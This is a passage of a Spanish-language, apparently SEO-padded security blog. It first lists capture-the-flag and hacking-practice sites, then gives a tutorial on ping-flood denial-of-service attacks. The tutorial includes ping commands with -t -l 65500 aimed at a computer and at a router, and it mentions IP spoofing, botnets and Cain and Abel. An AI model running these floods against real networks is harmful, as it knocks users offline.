pwn0 es la VPN donde (casi) todo pasa. Según profesor de curso de ciberseguridad y seguridad perimetral está enfocado a Ir en contra de pwn0bots u otros usuarios y sumar puntos mediante la obtención de la raíz en otros sistemas.

 

pwn0 

12. EXPLOIT EXERCISES

Exploit Exercises ofrece una variedad de máquinas virtuales, la documentación y los desafíos que se pueden utilizar para aprender sobre una variedad de temas curso de ciberseguridad y seguridad perimetral como escalada de privilegios, análisis de vulnerabilidad, explotar el desarrollo, depuración, ingeniería inversa, y las soluciones de seguridad cibernética en general.

 

exploit-excercise

 

13. RINGZER0 TEAM ONLINE CTF

RingZer0 Team Online CTF ofrece un montón de desafíos, alrededor de 234, que pondrá a prueba sus habilidades de hacker a través de múltiples categorías, incluyendo la criptografía, Escapar de la cárcel, análisis de malware, inyección SQL, codificación Shell y más. Según profesor de curso de ciberseguridad después de completar con éxito un reto, puede escribir hasta su solución y enviarlo al RingZer0team. Si se acepta su escritura, usted ganará RingZer0Gold que puede ser intercambiado por consejos durante los retos futuros.

 

RingZer0 Team Online CTF

 

14. HELLBOUND HACKERS

Los hackers hellbound ofrece tradicionales desafíos de explotación, pero también ofrecen algunos de los retos que otros no tienen, como web y parcheo de aplicaciones y desafíos cronometrados. Acuerdo a curso de ciberseguridad y seguridad perimetral en los retos web y parcheo de aplicaciones tienen que evaluar un pequeño fragmento de código, la identificación de la código explotable y sugerir el código de parche.

 

hellbound-hackers

 

15. TRY2HACK

Try2Hack proporciona retos orientados a las soluciones de ciberseguridad y seguridad perimetral para su entretenimiento y es uno de los sitios más antiguos de desafíos que aun esta alrededor. Los desafíos son diversos y se hacen progresivamente más difíciles.

 

try2hack

16. HACK.ME

Hack.me es una gran colección de aplicaciones web vulnerables para practicar sus habilidades de hacker ofensivos y seguridad perimetral. Todas las aplicaciones web vulnerables son aportadas por la comunidad y cada uno se puede ejecutar en un entorno limitado de seguridad aislado.

 

hack-me

 

17. HACKTHIS !!

HackThis !!Se compone de más de 50 niveles de hacking y seguridad perimetral; cada uno tiene un valor de un número determinado de puntos en función de su nivel de dificultad.

 

hackthis

18. ENIGMA GROUP

Enigma Group cuenta con más de 300 desafíos con un enfoque en las Top 10 OWASP vulnerabilidades y curso de ciberseguridad. Ellos cuentan con casi 48.000 miembros activos y albergan desafíos CTF semanales, así como concursos semanales y mensuales de seguridad perimetral.

 

enigma-group

 

19. GOOGLE GRUYERE

Google Gruyere muestra cómo vulnerabilidades de las aplicaciones web pueden ser explotadas y cómo defenderse contra estos ataques. Acuerdo a curso de ciberseguridad, usted tendrá la oportunidad de hacer algunas pruebas de intrusión real y realmente explotar una aplicación real con ataques como XSS y XSRF.

 

google-gruyere

 

20. GAME OF HACKS

Game of Hacks te presenta una serie de fragmentos de código, estilo cuestionario de opción múltiple, y se debe identificar la vulnerabilidad del código correcto.

 

game-of-hacks

 

21. ROOT ME

Root Me acoge a más de 200 desafíos de hacking, soluciones de ciberseguridad y 50 entornos virtuales que te permiten practicar tus habilidades de hacker a través de una variedad de escenarios.

 

root-me

Podría aprender más sobre soluciones de ciberseguridad, seguridad perimetral etc durante el curso de ciberseguridad.

 

¿QUÉ ES UN ATAQUE DOS DE PING FLOODING?

Posted on

Un DoS (Denegación de Servicio) es un intento de hacer que los recursos de un ordenador no estén disponibles para su usuario. Cuando no hay seguridad perimetral, un ataque DoS pueda desactivar un ordenador y sus redes si se planea y ejecuta cuidadosamente. Se puede montar desde cualquier parte, en cualquier momento de todas maneras según expertos de seguridad en redes.

Por lo general, un atacante no usa su propio ordenador. Se crearía lo que se llamado Botnet. De esta manera, el hacker puede controlar varios ordenadores de forma anónima para atacar un objetivo para derribarlo seguridad perimetral. El atacante también podría utilizar Tunneling y IP Spoofing para camuflar su identidad y evitar cualquier mecanismo de seguridad en redes.

¿QUÉ ES UN PING FLOODING?

En este tutorial vamos a centrarnos en un tipo de ataque llamado Ping flood con ayuda de expertos de seguridad en redes. Ping flooding es la forma más primitiva de ataques DoS, porque cualquiera puede hacerlo muy fácilmente. Cuando un equipo objetivo se encuentra bajo un ataque de ping flood, lo que sucede es la red del ordenador se falla, tratando de mantenerse con las solicitudes de ping. Sin mecanismo de seguridad perimetral, cada vez que el servidor recibe una solicitud de ping tiene que calcularla y a continuación, enviar una respuesta con la misma cantidad de datos. Ping flooding es cuando el atacante inunda el servidor con solicitudes de ping y el servidor tiene que calcular toneladas de peticiones de cada fracción de segundo, lo cual ocupa una gran cantidad de recursos.

ping flooding

Cuando haces ping flooding desde tu propio ordenador, estarías básicamente atacándote a ti mismo también a menos que uses IP Spoofing según expertos de seguridad en redes.

PING FLOODING 

En este tutorial se te enseñara este tipo de ataques DoS:

  • Targeted local disclosed ping flood (IP Addy)
  • Router disclosed ping flood
  • Blind ping flood (Unknown IP Addy)

TARGETED LOCAL DISCLOSED PING FLOOD

Un ataque Targeted local disclosed ping flood es cuando no hay seguridad perimetral y se conoce la dirección IP del destino conectado a la red y se ataca directamente.

Muy bien, por lo que desea hacer ping flood a un solo equipo. En primer lugar tenemos que asegurarnos de que estamos conectados a él, inicia control de comandos y escribe:

ipconfig

Lo que estamos buscando es una dirección IP local que nosotros podamos atacar. Busca un registro llamado IPv4 Address.

ping flooding

Vamos a atacar directamente al blanco, entonces ve a la otra PC y abre el control de comando y escribe esto allí:

ping *ip address here* -t -l 65500

Utilice la dirección IP que ha anotado desde el otro PC y sustituye *ipaddresshere * con esa dirección IP. Verás que está haciendo ping al equipo que has especificado explica experto de seguridad en redes. Ahora esta hacienda ataque de ping flooding.

ping flooding

Para entender correctamente el comando aquí está el argumento desglosado: El -t especifica que se mantiene haciendo ping al blanco hasta que se acaba el tiempo (o se desconecta hasta que lo detengas). -l especifica la información que quieres enviar, por lo que estamos enviando 65500 bytes al blanco cada ping. Esa es una gran cantidad de datos a gestionar, el tamaño habitual de ping por defecto es de 32 bytes.

Si se echa un vistazo en el PC que está siendo atacada, notarás un aumento bastante significativo en la actividad y disminuicion de la velocidad.

ping flooding

ROUTER DISCLOSED PING FLOOD

Un router disclosed ping flood tiene los mismos fundamentos como objetivo uno, excepto que tu apuntas a los routers y no una computadora. Cuando haces ping flood a un router tú pones en peligro la red que lo está alojando. Si hay unos 20 ordenadores conectados a un router sin seguridad perimetral y el router es bajo ataque DoS, los 20 equipos no serán capaces de comunicarse entre sí o con el router.

Tiene el mismo procedimiento que el target flood, excepto que necesita saber la dirección IP interna del router. Abre el indicador de comando y escribe:

ipconfig

Necesitamos la Default Gateway, esta es la dirección IP local del router.

ping flooding

ping 192.168.1.1 -t -l 65500

Cuando ejecute este comando, verás la pantalla de comandos ahora haciendo ping al router con 65500 bytes cada ping. Cuando el objetivo es un ordenador en una red a través de un switch o router, en general, el router / switch se llevará la peor parte del ataque y podría hacer que se caiga, lo que resulta en un restablecimiento completo acuerdo a experto de seguridad en redes.

BLIND PING FLOOD

Un ataque ciego de cualquier tipo es cuando el atacante no conoce la dirección IP de su objetivo y usa las técnicas para descubrir a través de programas externos. Nosotros vamos a usar Cain y Abel para recuperar una lista de direcciones IP. Usted puede aprender más sobre esto en el curso de seguridad en redes y seguridad perimetral.